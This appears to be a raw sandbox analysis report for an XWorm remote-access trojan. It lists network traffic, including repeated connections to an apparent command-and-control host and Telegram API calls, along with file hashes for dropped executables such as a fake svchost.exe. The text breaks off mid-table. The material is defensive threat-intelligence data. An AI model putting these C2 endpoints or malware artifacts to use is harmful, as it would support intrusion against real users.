| NL | 66.203.127.11:443 | eu.static.mega.co.nz | tcp |
| LU | 66.203.125.13:443 | g.api.mega.co.nz | tcp |
| LU | 66.203.125.13:443 | g.api.mega.co.nz | tcp |
| US | 8.8.8.8:53 | 11.127.203.66.in-addr.arpa | udp |
| N/A | 127.0.0.1:8000 | tcp | |
| NL | 66.203.127.11:443 | eu.static.mega.co.nz | tcp |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| PL | 209.25.141.180:38848 | full-wet.at.ply.gg | tcp |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| US | 8.8.8.8:53 | codeload.github.com | udp |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| PL | 209.25.141.180:38848 | full-wet.at.ply.gg | tcp |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| PL | 209.25.141.180:38848 | full-wet.at.ply.gg | tcp |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| US | 8.8.8.8:53 | api.github.com | udp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | github-cloud.s3.amazonaws.com | udp |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| PL | 209.25.141.180:38848 | full-wet.at.ply.gg | tcp |
| N/A | 127.0.0.1:8000 | tcp | |
| GB | 20.26.156.215:443 | github.com | tcp |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| US | 8.8.8.8:53 | www.youtube.com | udp |
| GB | 216.58.213.14:443 | www.youtube.com | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 8.8.8.8:53 | spotlights-feed.github.com | udp |
| US | 185.199.108.153:443 | spotlights-feed.github.com | tcp |
| GB | 216.58.213.14:443 | www.youtube.com | udp |
| GB | 142.250.180.22:443 | i.ytimg.com | tcp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| GB | 172.217.169.34:443 | googleads.g.doubleclick.net | tcp |
| US | 8.8.8.8:53 | 14.213.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 153.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | accounts.google.com | udp |
| US | 8.8.8.8:53 | jnn-pa.googleapis.com | udp |
| US | 8.8.8.8:53 | static.doubleclick.net | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | yt3.ggpht.com | udp |
| BE | 74.125.206.84:443 | accounts.google.com | udp |
| GB | 172.217.169.34:443 | googleads.g.doubleclick.net | udp |
| GB | 142.250.200.42:443 | jnn-pa.googleapis.com | tcp |
| GB | 142.250.178.4:443 | www.google.com | tcp |
| GB | 142.250.187.225:443 | yt3.ggpht.com | tcp |
| GB | 142.250.200.42:443 | jnn-pa.googleapis.com | tcp |
| GB | 142.250.178.4:443 | www.google.com | tcp |
| GB | 142.250.200.42:443 | jnn-pa.googleapis.com | udp |
| US | 8.8.8.8:53 | 34.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 225.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 42.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.180.250.142.in-addr.arpa | udp |
| GB | 142.250.179.230:443 | static.doubleclick.net | tcp |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| PL | 209.25.141.180:38848 | full-wet.at.ply.gg | tcp |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| PL | 209.25.141.180:38848 | full-wet.at.ply.gg | tcp |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| PL | 209.25.141.180:38848 | full-wet.at.ply.gg | tcp |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| PL | 209.25.141.180:38848 | full-wet.at.ply.gg | tcp |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| US | 8.8.8.8:53 | exmple.com | udp |
| US | 67.210.233.131:80 | exmple.com | tcp |
| US | 8.8.8.8:53 | 131.233.210.67.in-addr.arpa | udp |
| US | 8.8.8.8:53 | full-wet.at.ply.gg | udp |
| PL | 209.25.141.180:38848 | full-wet.at.ply.gg | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | api.github.com | udp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| US | 8.8.8.8:53 | bazaar.abuse.ch | udp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 151.101.2.49:443 | bazaar.abuse.ch | tcp |
| US | 151.101.2.49:443 | bazaar.abuse.ch | tcp |
| US | 8.8.8.8:53 | 49.2.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 226.21.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.169.217.172.in-addr.arpa | udp |
| PL | 209.25.141.180:38848 | full-wet.at.ply.gg | tcp |
| NL | 149.154.167.99:443 | oauth.tg.dev | tcp |
| NL | 149.154.167.99:443 | oauth.tg.dev | tcp |
| US | 34.111.108.175:443 | cdn5.cdn-telegram.org | tcp |
| NL | 149.154.167.99:443 | oauth.tg.dev | tcp |
| NL | 149.154.167.99:443 | oauth.tg.dev | tcp |
| US | 8.8.8.8:53 | 175.108.111.34.in-addr.arpa | udp |
| PL | 209.25.141.180:38848 | full-wet.at.ply.gg | tcp |
| BE | 74.125.206.84:443 | accounts.google.com | udp |
| US | 8.8.8.8:53 | github-cloud.s3.amazonaws.com | udp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | codeload.github.com | udp |
| GB | 20.26.156.216:443 | codeload.github.com | tcp |
| PL | 209.25.141.180:38848 | full-wet.at.ply.gg | tcp |
| PL | 209.25.141.180:38848 | full-wet.at.ply.gg | tcp |
| US | 8.8.8.8:53 | api.github.com | udp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| PL | 209.25.141.180:38848 | full-wet.at.ply.gg | tcp |
| BE | 88.221.83.218:443 | www.bing.com | tcp |
| BE | 88.221.83.218:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | 218.83.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github-cloud.s3.amazonaws.com | udp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| PL | 209.25.141.180:38848 | full-wet.at.ply.gg | tcp |
| N/A | 239.255.255.250:3702 | udp | |
| N/A | 239.255.255.250:3702 | udp | |
| US | 8.8.8.8:53 | c.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.2.0.f.f.ip6.arpa | udp |
| PL | 209.25.141.180:38848 | full-wet.at.ply.gg | tcp |
| PL | 209.25.141.180:38848 | full-wet.at.ply.gg | tcp |
| N/A | 127.0.0.1:8001 | tcp | |
| N/A | 127.0.0.1:8001 | tcp | |
| N/A | 127.0.0.1:8001 | tcp | |
| N/A | 127.0.0.1:8001 | tcp | |
| N/A | 127.0.0.1:8001 | tcp | |
| N/A | 127.0.0.1:8001 | tcp | |
| N/A | 127.0.0.1:8001 | tcp | |
| N/A | 127.0.0.1:8001 | tcp | |
| BE | 74.125.206.84:443 | accounts.google.com | udp |
| N/A | 127.0.0.1:8001 | tcp | |
| PL | 209.25.141.180:38848 | full-wet.at.ply.gg | tcp |
| N/A | 127.0.0.1:8001 | tcp | |
| N/A | 127.0.0.1:8001 | tcp | |
| N/A | 127.0.0.1:8001 | tcp | |
| N/A | 127.0.0.1:8001 | tcp | |
| N/A | 127.0.0.1:8001 | tcp | |
| N/A | 127.0.0.1:8001 | tcp | |
| N/A | 127.0.0.1:8001 | tcp | |
| N/A | 127.0.0.1:8001 | tcp | |
| N/A | 127.0.0.1:8001 | tcp | |
| N/A | 127.0.0.1:8001 | tcp | |
| PL | 209.25.141.180:38848 | full-wet.at.ply.gg | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| N/A | 127.0.0.1:8001 | tcp | |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| N/A | 127.0.0.1:8001 | tcp | |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| N/A | 127.0.0.1:8001 | tcp | |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| N/A | 127.0.0.1:8001 | tcp | |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| N/A | 127.0.0.1:8001 | tcp | |
| N/A | 127.0.0.1:8001 | tcp | |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| N/A | 127.0.0.1:8001 | tcp | |
| N/A | 127.0.0.1:8001 | tcp | |
| US | 8.8.8.8:53 | full-wet.at.ply.gg | udp |
| PL | 209.25.141.180:38848 | full-wet.at.ply.gg | tcp |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| PL | 209.25.141.180:38848 | full-wet.at.ply.gg | tcp |
| N/A | 127.0.0.1:8000 | tcp | |
| PL | 209.25.141.180:38848 | full-wet.at.ply.gg | tcp |
| US | 67.210.233.131:80 | exmple.com | tcp |
| N/A | 127.0.0.1:8000 | tcp | |
| PL | 209.25.141.180:38848 | full-wet.at.ply.gg | tcp |
| PL | 209.25.141.180:38848 | full-wet.at.ply.gg | tcp |
| PL | 209.25.141.180:38848 | full-wet.at.ply.gg | tcp |
Files
| MD5 | 41876349cb12d6db992f1309f22df3f0 |
| SHA1 | 5cf26b3420fc0302cd0a71e8d029739b8765be27 |
| SHA256 | e09f42c398d688dce168570291f1f92d079987deda3099a34adb9e8c0522b30c |
| SHA512 | e9a4fc1f7cb6ae2901f8e02354a92c4aaa7a53c640dcf692db42a27a5acc2a3bfb25a0de0eb08ab53983132016e7d43132ea4292e439bb636aafd53fb6ef907e |
C:\Users\Admin\AppData\Local\Google\Chrome\Pandora\ShaderCache\data_0
| MD5 | cf89d16bb9107c631daabf0c0ee58efb |
| SHA1 | 3ae5d3a7cf1f94a56e42f9a58d90a0b9616ae74b |
| SHA256 | d6a5fe39cd672781b256e0e3102f7022635f1d4bb7cfcc90a80fffe4d0f3877e |
| SHA512 | 8cb5b059c8105eb91e74a7d5952437aaa1ada89763c5843e7b0f1b93d9ebe15ed40f287c652229291fac02d712cf7ff5ececef276ba0d7ddc35558a3ec3f77b0 |
C:\Users\Admin\AppData\Local\Google\Chrome\Pandora\Crashpad\settings.dat
| MD5 | b72ccf74a88b62706af12d6073b1c4bf |
| SHA1 | af09cb48102a916c3d8e8c678b6b4a3df1a817d3 |
| SHA256 | 937665e0c77b99ac62eecdd3b7a0411db2e3fd4058a9ad45e6c9ae5164849c39 |
| SHA512 | b6424efd8c5e74f3fa0bc881d3ad66dc987cbdaa7d9fc6f778f7828d4d1d92db2a6bd36122f2bcc27702f3e006972acc3f4caea163f3b4b6b41158c6e4f5598b |
C:\Users\Admin\AppData\Local\Google\Chrome\Pandora\Default\f92323cb-8f12-4c4f-83d1-edf3f02da4ea.tmp
| MD5 | 5058f1af8388633f609cadb75a75dc9d |
| SHA1 | 3a52ce780950d4d969792a2559cd519d7ee8c727 |
| SHA256 | cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8 |
| SHA512 | 0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21 |
C:\Users\Admin\AppData\Local\Google\Chrome\Pandora\Local State
| MD5 | dcf900280f194aae7a8dad528c5f4510 |
| SHA1 | b7c22c2d96d9b57ebd6fa109cce31fd7f5278dab |
| SHA256 | 6c12842f1905ccd1887e622c2c7cf058c309458b6d5905d90c76764b5bf6344b |
| SHA512 | 405c820e91556598f37f69abdf480c1393ba97bf9789ce73f003b585f543ac0f4dc3fad83b9f71fe09a840f5a000230fbb95f5ad5816300b9a239a1655ec82e2 |
C:\Users\Admin\AppData\Local\Google\Chrome\Pandora\Default\Preferences
| MD5 | b51b73ced77d3220ea83c47fc4fe6bb9 |
| SHA1 | 9b815a93ea9dff8bce0893ac73f5c64e44761e85 |
| SHA256 | c935ad4a619d11bf8bbc93cd1a5b1659c35db8a6a440fd96f64700bced5bc334 |
| SHA512 | 4d4d94d544d5d6b4d0179ca8c8715f7dfa54de64da14713c0b791fdce00e671069e6d9ff706372a78ba20b3d4ebf574ce0b774f7d8813c6b445a7647c1ae7935 |
C:\Users\Admin\AppData\Local\Google\Chrome\Pandora\Default\Network\TransportSecurity
| MD5 | 6e622bd7de2fc06539e5cfb6d4bc7c16 |
| SHA1 | 842ebb0e63aba88548a5a4a9794c4d7c4a06ee80 |
| SHA256 | 29804baa65c713df1155d25597643a0c4c486ccd3d1a21de15685b263b90668e |
| SHA512 | 7f9dfa5554b702e87019943999ff4788bc2aba6b3b3bb59fc9488bb92b24df5c37cc5b8ff895379db7d8766950e641a730ebc0774171cef0aa6ac479a2999b45 |
C:\Users\Admin\AppData\Local\Google\Chrome\Pandora\Module Info Cache
| MD5 | b0954fb5350a94a10dab45095537f533 |
| SHA1 | 684e24a3a8a2dbfbe394a17be601170b62b38f4c |
| SHA256 | 373c89abeb67c0f3f62799afdca90b403070d0aeb12f960f0d07274c32653f3b |
| SHA512 | bb40905746730e9dbac4373f3767a6f5d0ab2f9a130dd2f91612e82612883c0c6ffb1b7129f92a903ae2b86bbc7ff8aee675f58a6ded31d2ae9088f18d448465 |
C:\Users\Admin\AppData\Local\Google\Chrome\Pandora\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 23ca5cba26688757b60ce503cd1ff6c4 |
| SHA1 | 999d8b84b7a9a0ae054b2389480624e4ef747091 |
| SHA256 | fbf732e247eda52ff8b2356405b5a9b596eaedb4b00926543e8f5b595f9f97ca |
| SHA512 | dd1755a649550d172634d612c396f3b077ca052dda64c1db8618b9fc479bbd10ee0bf81c21064d63f60b133a0a8d16f5965152859830cbaff35091e475df6bca |
C:\Users\Admin\AppData\Local\Google\Chrome\Pandora\Default\Code Cache\js\index-dir\the-real-index~RFe5c2070.TMP
| MD5 | 6d5a2baac4f9567d60b5642ae438876f |
| SHA1 | b0e4768d356c2e71ade39b5894fb64c196f436bb |
| SHA256 | cc13c8b7c907e21803ad372efecb2375e7be86f98dfa9be58e259947be0cc625 |
| SHA512 | 1bbb04f639e639f34bcf8fdd341f466fea2a51fc4d67789c5d6808ba41bc106926382b2e0b9530f8b5ae8f471d9a4a27f3a83a397b7905710efe99d16e1db0ba |
C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\Tools\options.vnc
| MD5 | 24f5e966d65e79745d3303b950496810 |
| SHA1 | 76b05ca8cac7a49bec0c413270e4af5ce891dbf9 |
| SHA256 | 9b7645a27b48ec94958a9a95326860c811b9fb3b9d82901102671e7c64416d3f |
| SHA512 | b77bcc8f62db51c2b120e664d9f78c1896a943d56d4e3fdf7b4520a021458181cf70457ae486b12439905351bac8df875320a02b79b0f8ad4f9eacaa00379c5d |
memory/2652-1414-0x0000000002230000-0x0000000002231000-memory.dmp
memory/2652-1417-0x0000000000400000-0x0000000000502000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\Pandora\Default\Network\Network Persistent State
| MD5 | 3f48965a65227c6ba62a7bf6aeacda8e |
| SHA1 | 0c874bf5d42076adb21eb3e142a55b3acb36fa38 |
| SHA256 | 06b67add93b9f59744fb9e3c29ddc6fc5b97df0eb0aac36cf8e5b811e0cc31c9 |
| SHA512 | 018b064a6c8bffeeb9f5b78eceaee18f61f441b187f291039eaa2dbb3432e3b917056a5f0b761c2554502cf2aff297c01aede43af794fc79cdb7a67c667726bb |
C:\Users\Admin\AppData\Local\Google\Chrome\Pandora\Default\Network\TransportSecurity
| MD5 | 8644b46dccaa7c5ada6f9da22054a8d6 |
| SHA1 | 7a32e8e55aad2be949531a771ba38a69f5cc4329 |
| SHA256 | 1169de5762a6513baa32bf475c56fb48c29d3952a1f61b566f1849d2a3bed778 |
| SHA512 | f7a8ea9d669ee0899ad1847d8f3e8f026dceb48f19c298fab02d4a9f9235dc4fb24dc76d9b756212e0cf079c2045622e83ed3803e5e9602b9c39c4faeac74695 |
memory/3016-1452-0x0000015941750000-0x0000015941760000-memory.dmp
C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\Tools\options.vnc
| MD5 | 856bc6b09dd64a05856ce820c5684934 |
| SHA1 | 8083dbb6450d078e65b13827529b9d61c976c0c8 |
| SHA256 | 09a44d59daf673d23cf41b54ae66c797915a53e3ae0b7c72ecf504918d6b28d8 |
| SHA512 | 8ab164f2d0ed117fe0ac4c86799370f3e580c4ba1af9434986f5c5dd1a2a09999193f53908e96a460b05eb726b955ab9aee062996d52ccdeaddedbf6465c1bec |
memory/3016-1539-0x0000015941750000-0x0000015941760000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 7bea0f508971405600ec62102b0b821b |
| SHA1 | 087fe4520987f512364cec5c523b6b29d9c36bbb |
| SHA256 | fee6ee1b1f8e741dbad62add0bdf396dc4acbd0c486be12382b0c065579e6b70 |
| SHA512 | 6208ff0ca29b7b747b7d82c5c4deb43f0a2ebf539d2c58987ab18382eff21b706c5bb2aa597ee617716310c6e648456d3f151d9d3ed78a1dd2be13a54b364c1d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | c9a6fb74aa1d29cfb0033c26d1b8e146 |
| SHA1 | 0d821bba1975da8fbad900dea0a43960643f9a44 |
| SHA256 | 7bd56093477f1e17114eafd35288dbe76d410616cb09fad47e8d6a3ad35d806a |
| SHA512 | 6db04f427ada78642e5918b355ea73f1aa504d2735073d26d2bf588cece0daf1118fe0d3b892689598c45c7223a53e0467cbba5f0f5e4858187b28f956aaece2 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 55dc2c233cab0aca6610a34f0878cb0d |
| SHA1 | 30817dca5b80b045c1719fce1efc5e458b1f3753 |
| SHA256 | f1d91ec4a1aa3ee8bb428a4ffd9ab7d59afa69fcf89768e76e54e90dafe20384 |
| SHA512 | 1609dac3a1f13e5874d39bb1ee9330c8125f4f422f286e3be4a94cb6642802c21df8f1012ec1a6d0bf281a14487cc52fd46bb2cb343be7d91892b6fdfefee35c |
C:\Users\Admin\AppData\Local\Google\Chrome\Pandora\Default\Network\Network Persistent State
| MD5 | c05680b0d85bde153702f5757a1881ab |
| SHA1 | ad4879b4e88f1ca31e221806380a78208d0d9502 |
| SHA256 | e28f596dc63ca0d7dced7fc67ba233e405a63b513d19604061ceaa2dd4ba47e3 |
| SHA512 | d1b5bddad5f59f8eb84fa850e9119bb51850bc549fc007eeb439af56f9759fb73a2da82eafa96eba293528e85cab886c7e34984a81c1398532c86ad2e7714887 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 487c50a3d57da6e13c6c6189ad49cdf9 |
| SHA1 | 8b7404f365162444ce6b2c356567f89fe5ad25ef |
| SHA256 | 12a0cd034eac5585da9c8522f7f6962f747307af8d0fbe6024db0b1e39237f73 |
| SHA512 | 3b9e0ac0aaa56e7305fd86e6218c9da96db02acd76512c107656f84a5f5733ebf333770f52c0b4b6c8c0cb2624ab74768deaaeb7c106050af84ac44593b6f918 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | aefd77f47fb84fae5ea194496b44c67a |
| SHA1 | dcfbb6a5b8d05662c4858664f81693bb7f803b82 |
| SHA256 | 4166bf17b2da789b0d0cc5c74203041d98005f5d4ef88c27e8281e00148cd611 |
| SHA512 | b733d502138821948267a8b27401d7c0751e590e1298fda1428e663ccd02f55d0d2446ff4bc265bdcdc61f952d13c01524a5341bc86afc3c2cde1d8589b2e1c3 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | d3a34e57e84c51a05ba3a2fc399a6efa |
| SHA1 | bdb47ffb0b15a5009b1526291a2a22761a4f9b65 |
| SHA256 | 0fa49adbf4719e151d00b04b90bacde8e139b2d0a3497a300d90fb3b3568103f |
| SHA512 | 51e6635eea2b7c81296ed8c5884c61e40d0046551fcddf33612a7d137f1c36362f727bdcf26b0fb23707cadecf09f75be5eaceb08cff211f1b0297ed46cfd681 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | ef4ec162f9c141a98693b6d98f6d65a9 |
| SHA1 | 893edcdc55dc099926b145fe4a8a0284b6b91824 |
| SHA256 | ec03fab4238bb018f5dfd4d0b069430bbe6a9eca2eed75f6cce1e32c544d06d5 |
| SHA512 | 49a7d89acf700fdab4ff6ae598708d9049c49adb24093fe05e82f276da30b51416599b9d67ad1b10c542894333ac19bc87ab7826ea335fb6cd25642ef71aa7d7 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 6c73a8716c59cfc1719e655b6e2a6112 |
| SHA1 | 05e9b18e72680fb64a456b5023e6f4aafcd1273b |
| SHA256 | 2b0cf9761af95e6cb6734d606869179fb408c8bc2897eebf9fb569b3fc972a74 |
| SHA512 | 5066e137828bc807d5d3d23e92009fe9f8445ba4908470b42e22168e46bea93b57ef19600076c12ed0599495e3134c8b78d4f8ba94e0e49280e18db4a904cf50 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 0f72b3182262e326ecb6b058fbc1067b |
| SHA1 | c6fa80af486b23e030f9d2754d1a311c85ab3b66 |
| SHA256 | 207e3a397484771eb7ae7d1d4ad4dfc3d72697a80674eeea7fe865db2658cb58 |
| SHA512 | a48831754ff66beec5639b5a258bb4dcf64ea1d796e7880aa17d93d1524d7dd11d24d89ecde01d291022e134a4445ff8b47d0d37567041c80680c6d718cf469c |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | b7acf7eee9e2f16e42da2b3afa881c06 |
| SHA1 | 88ae41b56e12ec1d909abab9f32d2fb519ddf580 |
| SHA256 | 9aa8872de31a8524af41252b59dc10c0b5a83da1669a3acd95e0761386b5877c |
| SHA512 | 64f4e05f752129601e42e53056082b3b0fa21d3346686baa629a6701e4a4f649b193a56f66f62dc7c108400ade4be00ffbc9a9beab0c1eef347965da70df4982 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | a62c8895544fcb0ab42fb29bbbb5c543 |
| SHA1 | 38dfb878cd9da7775ffef490986c980cccb774eb |
| SHA256 | 7f3e7d7190e94811f8509e6fa583063f52880779b2247d963393ab9c200af791 |
| SHA512 | 085fa64c5657a7c8c03aaede7b60e0d0b1ce745ec03196c356de376e9a2bb5f5d64fd4cd973008d843c6ba0c075c8df4aa22b32bfa3543b924d25568d11a2cea |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 19d703071c38042864ce2c659e24526c |
| SHA1 | 1573ac8a3d7a039ad196dfd4708f576ddc19d7f6 |
| SHA256 | 0d0881224c295552155f04d27555147f19d925b9792a53b956793ff449aac77a |
| SHA512 | 246ea3759a1870cc832cbf60724e3ec0f16929d778e709542128c7a0f66c6ca52231a7f3e1c7e633bbc697d9ed8fc3ee82891fbda2573b49690bfea60d447679 |
C:\Users\Admin\AppData\Local\Google\Chrome\Pandora\Default\Network\Network Persistent State
| MD5 | 0b6ae2482206eabd98184407d4812b24 |
| SHA1 | 9499b92cbfd52593552b66bce42053a7715cff24 |
| SHA256 | 979703a7f53a7ee08efa6ba510651464335b8c22e7a608692609bd156918eab6 |
| SHA512 | aa234215b9c229c88c41921bba8be9ea7b7603ad4ac5f8556f1378f549c487902cabf9cdfd758de531b26ea8f8ff1c32626ac6a879d15feac1e4fae2ef57e597 |
memory/836-1864-0x0000000000E20000-0x000000000152A000-memory.dmp
memory/836-1865-0x00007FF990C30000-0x00007FF9916F2000-memory.dmp
memory/836-1866-0x000000001C150000-0x000000001C160000-memory.dmp
C:\Users\Admin\AppData\Roaming\XWorm V3.1.exe
| MD5 | 37a9fdc56e605d2342da88a6e6182b4b |
| SHA1 | 20bc3df33bbbb676d2a3c572cff4c1d58c79055d |
| SHA256 | 422ba689937e3748a4b6bd3c5af2dce0211e8a48eb25767e6d1d2192d27f1f58 |
| SHA512 | f556805142b77b549845c0fa2206a4cb29d54752dc5650d9db58c1bbe1f7d0fc15ce04551853fb6454873877dbb88bebd15d81b875b405cdcc2fd21a515820d3 |
memory/2808-1885-0x00000000002A0000-0x00000000002B8000-memory.dmp
memory/1372-1884-0x00007FF990C30000-0x00007FF9916F2000-memory.dmp
memory/836-1883-0x00007FF990C30000-0x00007FF9916F2000-memory.dmp
C:\Users\Admin\AppData\Roaming\svchost.exe
| MD5 | f23f6537464f47132cee7632b95daf28 |
| SHA1 | 1981d5d8ee8e600c613b3c11fdff435172ca725e |
| SHA256 | 32824c331cc98500763e67b45e616d9b0f5a63f21b87439d18feaac7b35785cb |
| SHA512 | d58575008b8358c6546f7605d5da27c2fd3578240d679a608c5d15950ce809c0af00dff0b989514a2f3a08e30c697684dcec7695ddbba659e2fa0811280a5a80 |
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zvgklhg2.izc.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 2fc9e110688386f553ae9bf31219b3b0 |
| SHA1 | 89ba40813cb0a5efcf5574ad174f1573ca4d5e96 |
| SHA256 | d242a64927ce6db904ab31a13c78c87fa41c9c0f2b9c7e6c3b40b50c18cf2e37 |
| SHA512 | 2753aa34f6cb357984ed3f88107174bf81f4bb6513dbacf7373eed4d281c268c2925201142d59f60698072d00b0a664199fe449b3055244e7f2a471305253bec |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 0dd15873132d24d04ffa1a263651de59 |
